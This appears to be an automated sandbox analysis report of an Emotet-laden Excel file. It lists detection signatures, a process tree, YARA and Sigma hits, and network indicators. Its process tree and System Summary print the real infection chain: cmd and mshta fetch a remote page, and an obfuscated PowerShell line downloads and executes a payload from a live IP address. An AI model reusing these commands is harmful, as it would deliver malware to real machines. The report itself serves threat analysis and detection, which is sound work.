Windows Analysis Report
2022-28-01_1202.xls

Overview

General Information

Sample Name: 2022-28-01_1202.xls
Analysis ID: 562524
MD5: e31371453defbbf8840b40b5bff8600a
SHA1: bf7b00bc9192d147adc9d2fa52c69fe796e55d67
SHA256: 7649a43612652c0b32353e7ae9898150f885a770db0d024d0d034c4171d5d684
Tags: SilentBuilder xls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2920 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2832 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 1928 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 1160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2548 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2712 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2640 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1276 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2792 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 512 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 1272 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source | Rule | Description | Author | Strings
2022-28-01_1202.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
2022-28-01_1202.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\2022-28-01_1202.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\2022-28-01_1202.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\ProgramData\JooSee.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
15.2.rundll32.exe.a50000.4.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
12.2.rundll32.exe.180000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.rundll32.exe.2860000.8.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.220000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
17.2.rundll32.exe.2a0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

System Summary

Source: File created, Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 1928, TargetFilename: C:\Users\user\AppData\Local
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160
Source: Process started, Author: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2832, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 1928
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2920, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2832
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160
Source: Process started, Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1928, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1160

AV Detection

Source: 15.2.rundll32.exe.220000.1.unpack, Malware Configuration Extractor: Emotet
Source: 2022-28-01_1202.xls, ReversingLabs: Detection: 11%
Source: hostfeeling.com, Virustotal: Detection: 10%
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/, Virustotal: Detection: 12%
Source: C:\ProgramData\JooSee.dll, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A7E00 FindFirstFileW,17_2_002A7E00

                            Software Vulnerabilities

                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
                            Source: global traffic DNS query: name: hostfeeling.com

                            Networking

                            Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
                            Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 23:14:50 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f478ea13105=1643411690; expires=Fri, 28-Jan-2022 23:15:50 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 23:14:50 GMTExpires: Fri, 28 Jan 2022 23:14:50 GMTContent-Disposition: attachment; filename="S2TSbn.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox View ASN Name: ARUBA-ASNIT ARUBA-ASNIT
                            Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
                            Source: Joe Sandbox View IP Address: 212.237.17.99 212.237.17.99
                            Source: unknown Network traffic detected: IP country count 21
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
                            Source: unknown DNS traffic detected: queries for: hostfeeling.com
